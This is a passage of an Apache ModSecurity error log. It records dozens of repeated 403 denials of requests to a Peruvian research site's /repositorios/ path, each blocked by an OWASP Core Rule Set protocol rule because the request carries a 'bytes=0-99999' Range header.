"bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTAJrayd7JfpBdXs7qgAAAIQ"] [Mon Feb 17 10:35:40.258979 2025] [:error] [pid 10664:tid 140634241349376] [client 190.102.150.245:36268] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTAJrayd7JfpBdXs7qwAAAIU"] [Mon Feb 17 10:35:40.356460 2025] [:error] [pid 10664:tid 140634098673408] [client 190.102.150.245:36270] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTAJrayd7JfpBdXs7rAAAAJY"] [Mon Feb 17 10:35:40.452711 2025] [:error] [pid 11230:tid 140634258134784] [client 190.102.150.245:36272] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTKvoDupyaoF2tAucjgAAAMM"] [Mon Feb 17 10:35:40.550232 2025] [:error] [pid 10664:tid 140634274920192] [client 190.102.150.245:36274] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTAJrayd7JfpBdXs7rQAAAIE"] [Mon Feb 17 10:35:40.647452 2025] [:error] [pid 10664:tid 140634090280704] [client 190.102.150.245:36276] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTAJrayd7JfpBdXs7rgAAAJc"] [Mon Feb 17 10:35:40.744503 2025] [:error] [pid 10664:tid 140634354153216] [client 190.102.150.245:36278] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTAJrayd7JfpBdXs7rwAAAIA"] [Mon Feb 17 10:35:40.841071 2025] [:error] [pid 11230:tid 140634115458816] [client 190.102.150.245:36280] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTKvoDupyaoF2tAucjwAAANQ"] [Mon Feb 17 10:35:40.937016 2025] [:error] [pid 11230:tid 140634354153216] [client 190.102.150.245:36282] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTKvoDupyaoF2tAuckAAAAMA"] [Mon Feb 17 10:35:41.034699 2025] [:error] [pid 11230:tid 140634132244224] [client 190.102.150.245:36284] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTavoDupyaoF2tAuckQAAANI"] [Mon Feb 17 10:35:41.136851 2025] [:error] [pid 10662:tid 140634241349376] [client 190.102.150.245:36286] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTf_97XY8xax64gWTkwAAAAU"] [Mon Feb 17 10:35:41.236012 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36288] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTavoDupyaoF2tAuckgAAAME"] [Mon Feb 17 10:35:41.331983 2025] [:error] [pid 11230:tid 140634140636928] [client 190.102.150.245:36290] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTavoDupyaoF2tAuckwAAANE"] [Mon Feb 17 10:35:41.429448 2025] [:error] [pid 11230:tid 140634157422336] [client 190.102.150.245:36292] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTavoDupyaoF2tAuclAAAAM8"] [Mon Feb 17 10:35:41.528994 2025] [:error] [pid 11230:tid 140634090280704] [client 190.102.150.245:36294] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTavoDupyaoF2tAuclQAAANc"] [Mon Feb 17 10:35:41.626037 2025] [:error] [pid 11230:tid 140634241349376] [client 190.102.150.245:36296] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTavoDupyaoF2tAuclgAAAMU"] [Mon Feb 17 10:35:41.722004 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:36298] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTavoDupyaoF2tAuclwAAAMI"] [Mon Feb 17 10:35:41.819737 2025] [:error] [pid 11230:tid 140634174207744] [client 190.102.150.245:36300] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTavoDupyaoF2tAucmAAAAM0"] [Mon Feb 17 10:35:41.916453 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:36302] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTavoDupyaoF2tAucmQAAAMk"] [Mon Feb 17 10:35:42.012828 2025] [:error] [pid 11230:tid 140634107066112] [client 190.102.150.245:36304] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTqvoDupyaoF2tAucmgAAANU"] [Mon Feb 17 10:35:42.108643 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:36306] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTqvoDupyaoF2tAucmwAAAM4"] [Mon Feb 17 10:35:42.207502 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:36308] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTqvoDupyaoF2tAucnAAAAMQ"] [Mon Feb 17 10:35:42.303295 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36310] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTqvoDupyaoF2tAucnQAAANM"] [Mon Feb 17 10:35:42.399854 2025] [:error] [pid 11230:tid 140634232956672] [client 190.102.150.245:36312] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTqvoDupyaoF2tAucngAAAMY"] [Mon Feb 17 10:35:42.496803 2025] [:error] [pid 10663:tid 140634207778560] [client 190.102.150.245:36314] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTrUcx1xj5z0EGUpRiwAAAEk"] [Mon Feb 17 10:35:42.594445 2025] [:error] [pid 11230:tid 140634149029632] [client 190.102.150.245:36316] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTqvoDupyaoF2tAucnwAAANA"] [Mon Feb 17 10:35:42.693756 2025] [:error] [pid 11230:tid 140634354153216] [client 190.102.150.245:36318] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTqvoDupyaoF2tAucoAAAAMA"] [Mon Feb 17 10:35:42.789165 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36320] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTqvoDupyaoF2tAucoQAAAME"] [Mon Feb 17 10:35:42.885811 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:36322] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTqvoDupyaoF2tAucogAAANY"] [Mon Feb 17 10:35:42.982546 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:36324] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTqvoDupyaoF2tAucowAAAMc"] [Mon Feb 17 10:35:43.079171 2025] [:error] [pid 11230:tid 140634090280704] [client 190.102.150.245:36326] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXT6voDupyaoF2tAucpAAAANc"] [Mon Feb 17 10:35:43.176043 2025] [:error] [pid 10663:tid 140634224563968] [client 190.102.150.245:36328] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXT7Ucx1xj5z0EGUpRjAAAAEc"] [Mon Feb 17 10:35:43.272955 2025] [:error] [pid 10663:tid 140634190993152] [client 190.102.150.245:36330] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXT7Ucx1xj5z0EGUpRjQAAAEs"] [Mon Feb 17 10:35:43.369700 2025] [:error] [pid 10664:tid 140634081888000] [client 190.102.150.245:36332] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTwJrayd7JfpBdXs7sAAAAJg"] [Mon Feb 17 10:35:43.465802 2025] [:error] [pid 10663:tid 140634174207744] [client 190.102.150.245:36334] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXT7Ucx1xj5z0EGUpRjgAAAE0"] [Mon Feb 17 10:35:43.568512 2025] [:error] [pid 11230:tid 140634241349376] [client 190.102.150.245:36336] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXT6voDupyaoF2tAucpQAAAMU"] [Mon Feb 17 10:35:43.672686 2025] [:error] [pid 10662:tid 140634274920192] [client 190.102.150.245:36338] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXT__97XY8xax64gWTlAAAAAE"] [Mon Feb 17 10:35:43.768210 2025] [:error] [pid 10664:tid 140634123851520] [client 190.102.150.245:36340] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTwJrayd7JfpBdXs7sQAAAJM"] [Mon Feb 17 10:35:43.861316 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:36342] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXT6voDupyaoF2tAucpgAAAMI"] [Mon Feb 17 10:35:43.957457 2025] [:error] [pid 11230:tid 140634174207744] [client 190.102.150.245:36344] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXT6voDupyaoF2tAucpwAAAM0"] [Mon Feb 17 10:35:44.054371 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:36346] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXUKvoDupyaoF2tAucqAAAAMk"] [Mon Feb 17 10:35:44.149062 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:36348] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id 